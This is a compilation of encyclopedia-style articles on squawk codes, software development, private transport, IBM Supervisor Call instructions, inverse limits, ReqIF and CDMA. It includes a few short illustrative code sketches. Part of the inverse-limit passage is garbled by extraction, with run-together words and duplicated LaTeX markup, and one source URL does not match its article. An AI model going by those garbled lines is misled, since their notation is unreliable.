Flights on visual flight rules (VFR), when in uncontrolled airspace, will "squawk VFR" (1200 in the United States and Canada, 7000 in Europe). Upon contact with an ATC unit, they will be told to squawk a certain code. When changing frequency, for instance because the VFR flight leaves controlled airspace or changes to another ATC unit, the VFR flight will be told to "squawk VFR" again.[6][7]
In order to avoid confusion over assigned squawk codes, ATC units will typically be allocated blocks of squawk codes, not overlapping with the blocks of nearby ATC units, to assign at their discretion.
Not all ATC units will use radar to identify aircraft, but they assign squawk codes nevertheless. As an example, London Information—the flight information service station that covers the southern half of the UK—does not have access to radar images, but does assign squawk code 1177 to all aircraft that receive a flight information service (FIS) from them. This tells other radar-equipped ATC units that a specific aircraft is listening on the London Information radio frequency, in case they need to contact that aircraft.[13]
The following codes are applicable worldwide.
See List of transponder codes for a list of country-specific and historic allocations.
|
https://en.wikipedia.org/wiki/Squawk_code
|
Software development is the process of designing and implementing a software solution to satisfy a user. The process is more encompassing than programming, writing code, in that it includes conceiving the goal, evaluating feasibility, analyzing requirements, design, testing and release. The process is part of software engineering, which also includes organizational management, project management, configuration management and other aspects.[1]
Software development involves many skills and job specializations including programming, testing, documentation, graphic design, user support, marketing, and fundraising.
Software development involves many tools including: compiler, integrated development environment (IDE), version control, computer-aided software engineering, and word processor.
The details of the process used for a development effort vary. The process may be confined to a formal, documented standard, or it can be customized and emergent for the development effort. The process may be sequential, in which each major phase (i.e. design, implement and test) is completed before the next begins, but an iterative approach – where small aspects are separately designed, implemented and tested – can reduce risk and cost and increase quality.
Each of the available methodologies is best suited to specific kinds of projects, based on various technical, organizational, project, and team considerations.[3]
Another focus in many programming methodologies is the idea of trying to catch issues such as security vulnerabilities and bugs as early as possible (shift-left testing) to reduce the cost of tracking and fixing them.[13]
In 2009, it was estimated that 32 percent of software projects were delivered on time and budget, and with the full functionality. An additional 44 percent were delivered, but missing at least one of these features. The remaining 24 percent were cancelled prior to release.[14]
Software development life cycle refers to the systematic process of developing applications.[15]
The sources of ideas for software products are plentiful. These ideas can come from market research including the demographics of potential new customers, existing customers, sales prospects who rejected the product, other internal software development staff, or a creative third party. Ideas for software products are usually first evaluated by marketing personnel for economic feasibility, fit with existing channels of distribution, possible effects on existing product lines, required features, and fit with the company's marketing objectives. In the marketing evaluation phase, the cost and time assumptions are evaluated.[16] The feasibility analysis estimates the project's return on investment, its development cost and timeframe. Based on this analysis, the company can make a business decision to invest in further development.[17] After deciding to develop the software, the company is focused on delivering the product at or below the estimated cost and time, and with a high standard of quality (i.e., lack of bugs) and the desired functionality. Nevertheless, most software projects run late and sometimes compromises are made in features or quality to meet a deadline.[18]
Software analysis begins with a requirements analysis to capture the business needs of the software.[19] Challenges for the identification of needs are that current or potential users may have different and incompatible needs, may not understand their own needs, and may change their needs during the process of software development.[20] Ultimately, the result of analysis is a detailed specification for the product that developers can work from. Software analysts often decompose the project into smaller objects, components that can be reused for increased cost-effectiveness, efficiency, and reliability.[19] Decomposing the project may enable a multi-threaded implementation that runs significantly faster on multiprocessor computers.[21]
During the analysis and design phases of software development, structured analysis is often used to break down the customer's requirements into pieces that can be implemented by software programmers.[22] The underlying logic of the program may be represented in data-flow diagrams, data dictionaries, pseudocode, state transition diagrams, and/or entity relationship diagrams.[23] If the project incorporates a piece of legacy software that has not been modeled, this software may be modeled to help ensure it is correctly incorporated with the newer software.[24]
Design involves choices about the implementation of the software, such as which programming languages and database software to use, or how the hardware and network communications will be organized. Design may be iterative, with users consulted about their needs in a process of trial and error. Design often involves people expert in aspects such as database design, screen architecture, and the performance of servers and other hardware.[19] Designers often attempt to find patterns in the software's functionality to spin off distinct modules that can be reused with object-oriented programming. An example of this is the model–view–controller, an interface between a graphical user interface and the backend.[25]
The central feature of software development is creating and understanding the software that implements the desired functionality.[26] There are various strategies for writing the code. Cohesive software has various components that are independent from each other.[19] Coupling is the interrelation of different software components, which is viewed as undesirable because it increases the difficulty of maintenance.[27] Often, software programmers do not follow industry best practices, resulting in code that is inefficient, difficult to understand, or lacking documentation on its functionality.[28] These standards are especially likely to break down in the presence of deadlines.[29] As a result, testing, debugging, and revising the code becomes much more difficult. Code refactoring, for example adding more comments to the code, is a solution to improve the understandability of code.[30]
Testing is the process of ensuring that the code executes correctly and without errors. Debugging is performed by each software developer on their own code to confirm that the code does what it is intended to. In particular, it is crucial that the software executes on all inputs, even if the result is incorrect.[31] Code reviews by other developers are often used to scrutinize new code added to the project, and according to some estimates dramatically reduce the number of bugs persisting after testing is complete.[32] Once the code has been submitted, quality assurance—a separate department of non-programmers for most large companies—tests the accuracy of the entire software product. Acceptance tests derived from the original software requirements are a popular tool for this.[31] Quality testing also often includes stress and load checking (whether the software is robust to heavy levels of input or usage), integration testing (to ensure that the software is adequately integrated with other software), and compatibility testing (measuring the software's performance across different operating systems or browsers).[31] When tests are written before the code, this is called test-driven development.[33]
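The test-first discipline mentioned above can be sketched minimally as follows. This is a hypothetical illustration (the `slugify` function and its behavior are invented for this example, not taken from the source): the test is written first to specify the behavior, and the implementation is then written to make it pass.

```python
# Test written first (test-driven development): it specifies the desired
# behavior before any implementation exists.
def test_slugify():
    assert slugify("Hello World") == "hello-world"
    assert slugify("  spaced  out  ") == "spaced-out"

# Minimal implementation written afterwards, just enough to pass the test.
def slugify(text: str) -> str:
    return "-".join(text.lower().split())

test_slugify()  # passes silently once the implementation satisfies the spec
```

In practice such tests live in a separate test suite and run under a test runner; the point here is only the ordering of test and implementation.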
Production is the phase in which software is deployed to the end user.[34]During production, the developer may create technical support resources for users[35][34]or a process for fixing bugs and errors that were not caught earlier. There might also be a return to earlier development phases if user needs changed or were misunderstood.[34]
Software development is performed by software developers, usually working on a team. Efficient communication between team members is essential to success. This is more easily achieved if the team is small, used to working together, and located near each other.[36] Communication also helps identify problems at an earlier stage of development and avoid duplicated effort. Many development projects avoid the risk of losing essential knowledge held by only one employee by ensuring that multiple workers are familiar with each component.[37] Software development involves professionals from various fields, not just software programmers but also product managers who set the strategy and roadmap for the product,[38] individuals specialized in testing, documentation writing, graphic design, user support, marketing, and fundraising. Although workers for proprietary software are paid, most contributors to open-source software are volunteers.[39] Alternately, they may be paid by companies whose business model does not involve selling the software, but something else—such as services and modifications to open source software.[40]
Computer-aided software engineering (CASE) is a set of tools for the partial automation of software development.[41] CASE enables designers to sketch out the logic of a program, whether one to be written or an already existing one, to help integrate it with new code or reverse engineer it (for example, to change the programming language).[42]
Documentation comes in two forms that are usually kept separate—that intended for software developers, and that made available to the end user to help them use the software.[43][44] Most developer documentation is in the form of code comments for each file, class, and method that cover the application programming interface (API)—how the piece of software can be accessed by another—and often implementation details.[45] This documentation is helpful for new developers to understand the project when they begin working on it.[46] In agile development, the documentation is often written at the same time as the code.[47] User documentation is more frequently written by technical writers.[48]
Accurate estimation is crucial at the feasibility stage and in delivering the product on time and within budget. The process of generating estimations is often delegated by the project manager.[49] Because the effort estimation is directly related to the size of the complete application, it is strongly influenced by the addition of features in the requirements—the more requirements, the higher the development cost. Aspects not related to functionality, such as the experience of the software developers and code reusability, are also essential to consider in estimation.[50] As of 2019[update], most of the tools for estimating the amount of time and resources for software development were designed for conventional applications and are not applicable to web applications or mobile applications.[51]
An integrated development environment (IDE) supports software development with enhanced features compared to a simple text editor.[52] IDEs often include automated compiling, syntax highlighting of errors,[53] debugging assistance,[54] integration with version control, and semi-automation of tests.[52]
Version control is a popular way of managing changes made to the software. Whenever a new version is checked in, the software saves a backup of all modified files. If multiple programmers are working on the software simultaneously, it manages the merging of their code changes. The software highlights cases where there is a conflict between two sets of changes and allows programmers to fix the conflict.[55]
A view model is a framework that provides the viewpoints on the system and its environment, to be used in the software development process. It is a graphical representation of the underlying semantics of a view.
The purpose of viewpoints and views is to enable human engineers to comprehend very complex systems and to organize the elements of the problem around domains of expertise. In the engineering of physically intensive systems, viewpoints often correspond to capabilities and responsibilities within the engineering organization.[56]
Fitness functions are automated and objective tests to ensure that new developments don't deviate from the established constraints, checks and compliance controls.[57]
Intellectual property can be an issue when developers integrate open-source code or libraries into a proprietary product, because most open-source licenses used for software require that modifications be released under the same license. As an alternative, developers may choose a proprietary alternative or write their own software module.[58]
|
https://en.wikipedia.org/wiki/Collaborative_software_development_model
|
Private transport (as opposed to public transport) is the personal or individual use of transportation that is not available for use by the general public, where in theory the user can decide freely on the time and route of transit ('choice rider' vs. 'captive rider'[1]), using vehicles such as a private car, company car, bicycle, dicycle, self-balancing scooter, motorcycle, scooter, aircraft, boat, snowmobile, carriage, or horse, or recreational equipment such as roller skates, inline skates, a sailboat, sailplane, or skateboard.
Private transport is in contrast to public transport and commercial non-public transport. While private transportation may be used alongside nearly all modes of public transportation, private railroad cars are rare (e.g. the royal train), although heritage railways are not. Unlike many forms of public transportation, which may be government subsidized or operated by privately owned commercial organizations for mass or general public use, the entire cost of private transportation is borne directly or indirectly by the individual user(s). However, some scholars argue that it is inaccurate to say that the costs are covered by the individual user, because a large (and often dominant) part of the cost of private transportation is the cost of the infrastructure on which individual trips rely. They therefore also work with a model of quasi-private mobility.[2]
Private transportation includes both non-motorized methods of private transit (pedestrians, cyclists, skaters, etc.) and all forms of self-propelled transport vehicles.
Non-public passenger transport in vehicles owned by the driver or passenger or operated by the driver.
Self driven transport in vehicles not owned by either the passengers or driver.
Non-scheduled transit vehicles such as taxicabs and rickshaws, which are rented or hired in the short term on demand with a driver, belong to the special forms of 'public transport', even if the user can freely decide on the time and route of transit.[citation needed]
Some means of transport are fixed-route, fixed-schedule passenger services, for example excursion riverboats, tourist cable cars, and resort ski lifts.
Private transport is the dominant form of transportation in most of the world. In the United States, for example, 86.2% of passenger miles are by passenger vehicles, motorcycles, and trucks.[3]
Cycling and walking, above all, have been recognized as the most sustainable transport systems. In general, all muscle-driven mobility will have a similar energy efficiency while at the same time being almost emission-free (apart from the CO2 exhaled during breathing).
The negative environmental impact of private transport can be alleviated by choosing the optimal modal share for a given environment and transport requirements.
|
https://en.wikipedia.org/wiki/Private_transport
|
A Supervisor Call instruction (SVC) is a hardware instruction used by the System/360 family of IBM mainframe computers up to the contemporary zSeries; the Amdahl 470V/5, 470V/6, 470V/7, 470V/8, 580, 5880, 5990M, and 5990A, and others; the Univac 90/60, 90/70 and 90/80, and possibly others; and the Fujitsu M180 (UP)[1] and M200 (MP), and others; and is also used in the Hercules open source mainframe emulation software. It causes an interrupt to request a service from the operating system. The system routine providing the service is called an SVC routine. SVC is a system call.
IBM mainframes in the System/360 and successor families operate in one of two states, problem state or supervisor state, and in one of sixteen storage access keys (0 to 15). In problem state, a large set of general purpose non-privileged instructions are available to a user program. In supervisor state, system programs are additionally able to use a small set of privileged instructions which are generally intended for supervisory functions. These functions may affect other users, other processors, or the entire computer system. In storage key 0 a program is able to access all addressable[a] storage; otherwise it is limited to storage areas with a matching key.
A program is only allowed to access specific supervisory functions after thorough authorization checking by the operating system: DEBCHK (SVC 117), TESTAUTH (SVC 119), and possibly additional tests. Programs which fail any of these tests are ABENDed, that is, abnormally terminated and immediately cease processing. Some of these tests were not available in OS/360, but were added in OS/VS1, SVS or MVS/370; all were available in MVS/370 or subsequent releases, and are still available to this day.
In OS/VS1, OS/VS2 (SVS), MVS/370 and subsequent versions of the OS, the MODESET function (SVC 107) obviated the need for many user-written SVCs, as this system SVC accommodated both changes in mode (problem state to supervisor state) and key (8–15 [user] to 0–7 [system]) in a single operation; many user-written SVCs had been intended only for simple mode and key changes anyway. The remaining special requirements were that the jobstep be APF authorized[b][c] and that the MODESET-invoking program be resident in a concatenation of libraries all of which were identified as authorized, and this secure approach was completely under the installation's control. This approach generally simplified user controls over authorization, although some simple changes to the application were thereby required. In general, user installations favored this approach, and the overall reliability of the system was significantly improved thereby.
Although mainframe applications are typically synchronous processes, the operating system itself is naturally asynchronous, although the system also supports many processes which are naturally synchronous. When an application requests a system service which is naturally asynchronous, such as input/output processing, a mechanism for synchronizing the application and the operating system must be employed. This essential mechanism is through functions which are built into the operating system, or are specifically supported by it, including: WAIT (temporarily halt application processing until an external event has occurred); POST (indicate occurrence of an external event so application processing may continue); and SYNCH (change system processing mode—supervisor to user and system key to user key—while preserving system integrity, and synchronously perform a function on behalf of the application, after which supervisor processing may continue).
The OS/360 SVCs table below indicates the conditions under which these synchronizing facilities may be employed.
SVC is a two-byte instruction with the hexadecimal operation code 0A; the second byte of the instruction, the SVC number, indicates the specific request.[2] The SVC number can be any value from 0 to 255, with the particular SVC number being up to the implementer of the operating system, e.g. on IBM's MVS, SVC 3 is used to terminate a program, while on the UNIVAC VS/9 and Fujitsu BS2000 operating systems, SVC 9 was used for the same purpose.
When a program issues an SVC, an interrupt occurs. The PSW, an 8-byte (on the System 360 and S/370) or 16-byte (on the z/System) privileged register containing, among other things, the current address of the instruction to be executed, the privilege bit (1 if privileged), and the storage key, is saved at a real[d] address. This is locations 32–39 on the 360 and 370; 320–335 on the z/System. The PSW is then loaded from a different real[d] address; it is 96–103 on the 360 and 370, 448–463 on the z/System. Execution resumes at the address that was loaded into the PSW. Bits 24–31 of the saved PSW (real[d] address 35 on the 360 and 370, 323 on the z/System) contain the Supervisor Call number.
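The two-byte instruction format described above (opcode 0A followed by the SVC number) is simple enough to sketch. This is a hedged illustration only—real SVCs are issued in assembler, and the helper names here are hypothetical:

```python
def encode_svc(number: int) -> bytes:
    """Build the two-byte SVC instruction: opcode 0x0A, then the SVC number."""
    if not 0 <= number <= 255:
        raise ValueError("SVC number must fit in one byte (0-255)")
    return bytes([0x0A, number])

def decode_svc(instruction: bytes) -> int:
    """Return the SVC number carried by a two-byte SVC instruction."""
    if len(instruction) != 2 or instruction[0] != 0x0A:
        raise ValueError("not an SVC instruction")
    return instruction[1]
```

For example, the MVS program-termination call SVC 3 mentioned above would encode as the byte pair 0A 03.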
SVC invokes a supervisory function—usually implemented as a "closed subroutine" of the system's SVC interrupt handler. Information passed to and from the SVC routines is passed in general purpose registers or in memory.
Under OS/360 and successors, return from an SVC routine is, for type 2, 3 and 4 SVC routines, via an SVC 3 (EXIT) invocation, and for other SVC types by the privileged Load PSW (LPSW) instruction, which is executed on behalf of the SVC routine by the control program's dispatcher or SVC interrupt handler.
Non-IBM operating systems—such as MUSIC/SP, developed by McGill University in Montreal, Canada, for IBM mainframes, and, for non-IBM mainframes, VS/9, developed by Univac (from the TSOS operating system for the RCA Spectra 70 series computers) for the UNIVAC Series 90 mainframe line, and the B800 operating system (also developed from the TSOS operating system) for Fujitsu's mainframes—all use the LPSW instruction to exit from a Supervisor Call.
The choice of whether to have a supervisor call return to the calling program directly through an LPSW instruction, or through some other means such as a subroutine return instruction or a supervisor call itself, is a matter of design. There is no obvious "right" way to do this; there can be reasons for both methods. Using an LPSW instruction to exit an SVC routine allows for faster execution, but means actual testing of the routine has to be done on a dedicated machine running the code as part of an actual operating system supervisor. If the code is written as an ordinary subroutine, it can be tested in the same manner as any ordinary program and potentially deployed without having to modify it. That approach also allows metrics to be gathered on how long a supervisor call routine takes to complete its task, allowing for analysis of routines that are excessively long in execution time (or ones that are very fast).
In OS/360 and later incarnations of the OS, branch and link entry points are alternatives to SVC invocations for some supervisor mode routines. In MVS/SP V1R3 and later incarnations of the OS, Program Call (PC) entries have augmented SVCs for invocations of many supervisory functions by both authorized and unauthorized programs; and some functions may only be invoked by branch or PC entries, e.g. STARTIO. (This also has the advantage of preventing IBM operating systems from being run on non-IBM hardware.)
Different IBM operating systems have little compatibility in the specific codes used or in the supervisor services which may be invoked. VM/370 and z/VM systems use the DIAG instruction in a similar manner, and leave SVC for the use of operating systems running in virtual machines. Most OS/360 SVCs have been maintained for "legacy" programs, but some SVCs have been "extended" over the passage of time.
In OS/360 and successor systems SVC numbers 0 through approximately 127 are defined by IBM, and 255 downwards are available for use by an installation's systems programming staff. z/OS changed this to SVC numbers 0 through approximately 200 for IBM, and 255 downwards for the installation, as additional system services, primarily in support of encryption/decryption, were being implemented by IBM using SVCs. SVC routines must have module names in a specific format beginning with IGC.
By system design, the term "disabled" means disabled for all interruptions except for machine check interruptions in pre-MVS/370 systems, and with the "local lock" being held, but not "disabled" for any interruptions in MVS/370 and all later systems. The former is physical disablement, the latter is logical disablement, as an address space's "local lock" has the same impact within its address space as physical disablement, but it has no impact on other address spaces.
OS/360 defined four types of SVC routines, called "Type 1" through "Type 4"; MVS/370 added an additional "Type 6", which is similar to "Type 1" except that the SVC routine is physically disabled. "Type 5" was neither defined nor implemented. The following information, part of a table for OS/360, augmented for MVS/370 and successor systems, gives an idea of the considerations involved in writing an SVC routine.
The size restrictions on types 3 and 4 SVC routines are necessary because they are loaded into designated "transient areas" (PLPA in post-MVT) when invoked.
OS/360 did not, in general, have any way of restricting the use of SVCs. Consequently, there were quite a number of unintentional system- and data-integrity exposures which were possible by employing certain sequences of SVCs and other instructions. It became common practice for curious users to attempt to discover these exposures, but some system programmers used these exposures rather than develop their own user-written SVCs.
Beginning with MVS/370, IBM considered it a product defect if a system design error would allow an application program to enter supervisor state without authorization. They mandated that all IBM SVCs be protected to close all system- and data-integrity exposures. They "guaranteed" to close such exposures as these were discovered. By Release 3.7 of MVS/370 in 1977, nearly every such exposure had indeed been identified and closed, at the cost of 100,000 Authorized Program Analysis Reports (APARs) and related Program temporary fixes (PTFs). This was a remarkable achievement, as system "up time" was thereafter measured in years, rather than in days or even in hours.
|
https://en.wikipedia.org/wiki/Supervisor_Call_instruction
|
In mathematics, the inverse limit (also called the projective limit) is a construction that allows one to "glue together" several related objects, the precise gluing process being specified by morphisms between the objects. Thus, inverse limits can be defined in any category, although their existence depends on the category that is considered. They are a special case of the concept of limit in category theory.
By working in the dual category, that is, by reversing the arrows, an inverse limit becomes a direct limit or inductive limit, and a limit becomes a colimit.
We start with the definition of aninverse system(or projective system) ofgroupsandhomomorphisms. Let(I,≤){\displaystyle (I,\leq )}be adirectedposet(not all authors requireIto be directed). Let (Ai)i∈Ibe afamilyof groups and suppose we have a family of homomorphismsfij:Aj→Ai{\displaystyle f_{ij}:A_{j}\to A_{i}}for alli≤j{\displaystyle i\leq j}(note the order) with the following properties:
Then the pair((Ai)i∈I,(fij)i≤j∈I){\displaystyle ((A_{i})_{i\in I},(f_{ij})_{i\leq j\in I})}is called an inverse system of groups and morphisms overI{\displaystyle I}, and the morphismsfij{\displaystyle f_{ij}}are called the transition morphisms of the system.
We define the inverse limit of the inverse system ((A_i)_{i∈I}, (f_ij)_{i≤j}) as a particular subgroup of the direct product of the A_i:

A = lim← A_i = { (a_i)_{i∈I} ∈ ∏_{i∈I} A_i : a_i = f_ij(a_j) for all i ≤ j in I }.
The inverse limit A comes equipped with natural projections π_i : A → A_i which pick out the i-th component of the direct product for each i in I. The inverse limit and the natural projections satisfy a universal property described in the next section.
This same construction may be carried out if the A_i's are sets,[1] semigroups,[1] topological spaces,[1] rings, modules (over a fixed ring), algebras (over a fixed ring), etc., and the homomorphisms are morphisms in the corresponding category. The inverse limit will also belong to that category.
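The compatibility condition defining the inverse limit can be made concrete with a small computation. The following sketch (an illustration, not part of the source) truncates the classic system Z/p¹Z ← Z/p²Z ← … ← Z/p^N Z, whose transition maps are reduction modulo p^i, and checks which tuples are compatible threads:

```python
# A finite-truncation sketch of the inverse limit of the system
#   Z/p^1 Z  <-  Z/p^2 Z  <-  ...  <-  Z/p^N Z,
# with transition maps f_ij(x) = x mod p^i for i <= j.
# An element of the inverse limit is a compatible tuple (a_1, ..., a_N).

p, N = 2, 5

def transition(x, i):
    """f_ij applied to x in Z/p^j Z, landing in Z/p^i Z."""
    return x % p**i

def is_compatible(a):
    """Check the inverse-limit condition a_i = f_ij(a_j) for all i <= j."""
    return all(a[i - 1] == transition(a[j - 1], i)
               for j in range(1, N + 1) for i in range(1, j + 1))

# Any integer determines a compatible thread, e.g. 13 gives (13 mod p^i)_i:
thread = tuple(13 % p**i for i in range(1, N + 1))
assert is_compatible(thread)

# An arbitrary tuple is usually not in the inverse limit:
assert not is_compatible((0, 1, 2, 3, 4))
```

Taking N → ∞ (with all compatible threads, not just those coming from integers) yields the p-adic integers Z_p, the standard example of an inverse limit.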
The inverse limit can be defined abstractly in an arbitrary category by means of a universal property. Let (X_i, f_ij) be an inverse system of objects and morphisms in a category C (same definition as above). The inverse limit of this system is an object X in C together with morphisms π_i : X → X_i (called projections) satisfying π_i = f_ij ∘ π_j for all i ≤ j. The pair (X, π_i) must be universal in the sense that for any other such pair (Y, ψ_i) there exists a unique morphism u : Y → X such that the diagram
commutes for all i ≤ j. The inverse limit is often denoted X = lim← X_i,
with the inverse system (X_i, f_ij) and the canonical projections π_i being understood.
In some categories, the inverse limit of certain inverse systems does not exist. If it does, however, it is unique in a strong sense: given any two inverse limits X and X′ of an inverse system, there exists a unique isomorphism X′ → X commuting with the projection maps.
Inverse systems and inverse limits in a category C admit an alternative description in terms of functors. Any partially ordered set I can be considered as a small category where the morphisms consist of arrows i → j if and only if i ≤ j. An inverse system is then just a contravariant functor I → C. Let C^(I^op) be the category of these functors (with natural transformations as morphisms). An object X of C can be considered a trivial inverse system, where all objects are equal to X and all arrows are the identity of X. This defines a "trivial functor" from C to C^(I^op). The inverse limit, if it exists, is defined as a right adjoint of this trivial functor.
For an abelian category C, the inverse limit functor

lim← : C^I → C

is left exact. If I is ordered (not simply partially ordered) and countable, and C is the category Ab of abelian groups, the Mittag-Leffler condition is a condition on the transition morphisms f_ij that ensures the exactness of lim←. Specifically, Eilenberg constructed a functor

lim←¹ : Ab^I → Ab
(pronounced "lim one") such that if (Ai,fij), (Bi,gij), and (Ci,hij) are three inverse systems of abelian groups, and
is ashort exact sequenceof inverse systems, then
is an exact sequence inAb.
If the ranges of the morphisms of an inverse system of abelian groups (A_i, f_ij) are stationary, that is, for every k there exists j ≥ k such that for all i ≥ j: f_kj(A_j) = f_ki(A_i), one says that the system satisfies the Mittag-Leffler condition.
The name "Mittag-Leffler" for this condition was given by Bourbaki in their chapter on uniform structures for a similar result about inverse limits of complete Hausdorff uniform spaces. Mittag-Leffler used a similar argument in the proof ofMittag-Leffler's theorem.
The following situations are examples where the Mittag-Leffler condition is satisfied:
An example where lim←¹ is non-zero is obtained by taking I to be the non-negative integers, letting A_i = p^i Z, B_i = Z, and C_i = B_i/A_i = Z/p^i Z. Then

lim←¹ A_i ≅ Z_p / Z,

where Z_p denotes the p-adic integers.
More generally, if C is an arbitrary abelian category that has enough injectives, then so does C^I, and the right derived functors of the inverse limit functor can thus be defined. The n-th right derived functor is denoted R^n lim← : C^I → C.
In the case where C satisfies Grothendieck's axiom (AB4*), Jan-Erik Roos generalized the functor lim¹ on Ab^I to a series of functors lim^n such that lim^n ≅ R^n lim←.
It was thought for almost 40 years that Roos had proved (in Sur les foncteurs dérivés de lim. Applications.) that lim¹ A_i = 0 for (A_i, f_ij) an inverse system with surjective transition morphisms and I the set of non-negative integers (such inverse systems are often called "Mittag-Leffler sequences"). However, in 2002, Amnon Neeman and Pierre Deligne constructed an example of such a system in a category satisfying (AB4) (in addition to (AB4*)) with lim¹ A_i ≠ 0. Roos has since shown (in "Derived functors of inverse limits revisited") that his result is correct if C has a set of generators (in addition to satisfying (AB3) and (AB4*)).
Barry Mitchell has shown (in "The cohomological dimension of a directed set") that if I has cardinality ℵ_d (the d-th infinite cardinal), then R^n lim is zero for all n ≥ d + 2. This applies to the I-indexed diagrams in the category of R-modules, with R a commutative ring; it is not necessarily true in an arbitrary abelian category (see Roos' "Derived functors of inverse limits revisited" for examples of abelian categories in which lim^n, on diagrams indexed by a countable set, is nonzero for n > 1).
The categorical dual of an inverse limit is a direct limit (or inductive limit). More general concepts are the limits and colimits of category theory. The terminology is somewhat confusing: inverse limits are a class of limits, while direct limits are a class of colimits.
|
https://en.wikipedia.org/wiki/Inverse_limit
|
.reqif
RIF/ReqIF (Requirements Interchange Format) is an XML file format that can be used to exchange requirements, along with their associated metadata, between software tools from different vendors. The requirements exchange format also defines a workflow for transmitting the status of requirements between partners. Although developed in the automotive industry, ReqIF is suitable for lossless exchange of requirements in any industry.
In 2004, HIS (Herstellerinitiative Software), a consortium of German automotive manufacturers, defined a generic requirements interchange format called RIF.
The format was handed over in 2008 to ProSTEP iViP e.V. for further maintenance. A project group responsible for international standardization further developed the format and handed over a revised version to the Object Management Group (OMG) as a "Request for Comment" in 2010.[1]
As the acronym RIF had an ambiguous meaning within the OMG, the new name ReqIF was introduced to separate it from the W3C's Rule Interchange Format.
In April 2011, version 1.0.1 of ReqIF was adopted by the OMG as a formal specification (OMG Document Number: formal/2011-04-02).
In October 2013, version 1.1 was published (OMG Document Number: formal/2013-10-01). Changes are restricted to the text of the standard; the XML schema and underlying model have not changed. Therefore, 1.1 and 1.0.1 .reqif files are equivalent.
In July 2016, version 1.2 was published (OMG Document Number: formal/2016-07-01). As with the previous versions, changes are restricted to the text of the standard; the XML schema and underlying model have not changed. Therefore, 1.2, 1.1 and 1.0.1 .reqif files are equivalent.
ReqIF is an exchange file format for exchanging requirements, attributes and additional files (e.g. images) across a chain of manufacturers, suppliers, sub-suppliers and the like. A GUID ensures unique identification of content across the process chain.
Requirements are typically elicited during the early phase of product development. This is the primary application of ReqIF, as development across organizations is happening more and more often. ReqIF allows for sharing of requirements between partners, even if different tools are used. In contrast to formats like Word, Excel or PDF, ReqIF allows for a loss-free exchange.
ReqIF was pioneered by automotive manufacturers, who started to demand the use of ReqIF in particular for the development of embedded controllers.
ReqIF is also used as the underlying data model for tool implementations. This is particularly true for the ReqIF reference implementation (Eclipse RMF), which is used by an implementer forum[2] that aims to ensure interoperability of various ReqIF implementations. ReqIF Server[3] is another tool that natively uses ReqIF.
RIF/ReqIF is a standardized meta-model, defined by an XML schema. Such files must conform to the schema and contain the description of the model (the datatypes) as well as the data. Data exchange between tools only succeeds if all parties agree on a common data model. The previously mentioned implementer forum is working on such a common model and also organizes tests with tools of the participating manufacturers, to ensure future interoperability.
An OMG ReqIF file consists of XML with the root element REQ-IF, containing information regarding the file itself as well as the contained datatypes and requirements.
The containers for requirements in ReqIF are called specification objects (SpecObject), which have user-defined attributes. Each attribute has a data type, which is one of Boolean, Integer, Real, String, Enumeration (with user-defined values) and XHTML, which also allows formatted text and embedded objects, including images. Some datatypes can be constrained further, e.g. the range of numerical values.
Relationships between objects are represented as SpecRelations, which can also have attributes.
Finally, hierarchical trees create a structured view of SpecObjects, called Specifications. Multiple references to the same SpecObject are permitted.
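To make the shape of these containers concrete, here is a deliberately simplified sketch of a ReqIF-like document. It is not schema-conformant: the element and attribute names below (beyond the REQ-IF root and the SpecObject/SpecRelation/Specification concepts named above) are illustrative assumptions, and required namespaces and header sections are omitted.

```python
# Simplified, NOT schema-conformant illustration of the ReqIF structure:
# a REQ-IF root containing datatypes, SpecObjects (requirement containers),
# SpecRelations between them, and a hierarchical Specification view.
import xml.etree.ElementTree as ET

doc = """
<REQ-IF>
  <DATATYPES>
    <DATATYPE-DEFINITION-STRING IDENTIFIER="dt-string"/>
  </DATATYPES>
  <SPEC-OBJECTS>
    <SPEC-OBJECT IDENTIFIER="req-001">
      <ATTRIBUTE-VALUE-STRING THE-VALUE="The system shall log all errors."/>
    </SPEC-OBJECT>
    <SPEC-OBJECT IDENTIFIER="req-002">
      <ATTRIBUTE-VALUE-STRING THE-VALUE="Logs shall be rotated daily."/>
    </SPEC-OBJECT>
  </SPEC-OBJECTS>
  <SPEC-RELATIONS>
    <SPEC-RELATION SOURCE="req-002" TARGET="req-001"/>
  </SPEC-RELATIONS>
  <SPECIFICATIONS>
    <SPECIFICATION IDENTIFIER="spec-1">
      <SPEC-HIERARCHY OBJECT="req-001">
        <SPEC-HIERARCHY OBJECT="req-002"/>
      </SPEC-HIERARCHY>
    </SPECIFICATION>
  </SPECIFICATIONS>
</REQ-IF>
"""

root = ET.fromstring(doc)
ids = [o.get("IDENTIFIER") for o in root.iter("SPEC-OBJECT")]
print(ids)  # ['req-001', 'req-002']
```

Note how the Specification tree references SpecObjects by identifier rather than containing them, which is what permits multiple references to the same SpecObject.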
The structure of ReqIF is described in detail in the specification.[4] A free one-page reference of the data model is also available.[5]
|
https://en.wikipedia.org/wiki/Requirements_Interchange_Format
|
Code-division multiple access (CDMA) is a channel access method used by various radio communication technologies. CDMA is an example of multiple access, where several transmitters can send information simultaneously over a single communication channel. This allows several users to share a band of frequencies (see bandwidth). To permit this without undue interference between the users, CDMA employs spread spectrum technology and a special coding scheme (where each transmitter is assigned a code).[1][2]
CDMA optimizes the use of available bandwidth as it transmits over the entire frequency range and does not limit the user's frequency range.
It is used as the access method in many mobile phone standards. IS-95, also called "cdmaOne", and its 3G evolution CDMA2000, are often simply referred to as "CDMA", but UMTS, the 3G standard used by GSM carriers, also uses "wideband CDMA", or W-CDMA, as well as TD-CDMA and TD-SCDMA, as its radio technologies. Many carriers (such as AT&T, US Cellular and Verizon) shut down 3G CDMA-based networks in 2022 and 2024, rendering handsets supporting only those protocols unusable for calls, even to 911.[3][4]
It can also be used as a channel or medium access technology, like ALOHA, or as a permanent pilot/signalling channel that allows users to synchronize their local oscillators to a common system frequency, thereby also continuously estimating the channel parameters.
In these schemes, the message is modulated onto a longer spreading sequence consisting of several chips (0s and 1s). Due to their very advantageous auto- and cross-correlation characteristics, these spreading sequences have also been used for radar applications for many decades, where they are called Barker codes (with a very short sequence length, typically 8 to 32).
For space-based communication applications, CDMA has been used for many decades due to the large path loss and Doppler shift caused by satellite motion. CDMA is often used with binary phase-shift keying (BPSK) in its simplest form, but can be combined with any modulation scheme, such as (in advanced cases) quadrature amplitude modulation (QAM) or orthogonal frequency-division multiplexing (OFDM), which typically makes it very robust and efficient (and equips it with accurate ranging capabilities, which is difficult without CDMA). Other schemes use subcarriers based on binary offset carrier (BOC) modulation, which is inspired by Manchester codes and enables a larger gap between the virtual center frequency and the subcarriers, which is not the case for OFDM subcarriers.
The technology of code-division multiple access channels has long been known.
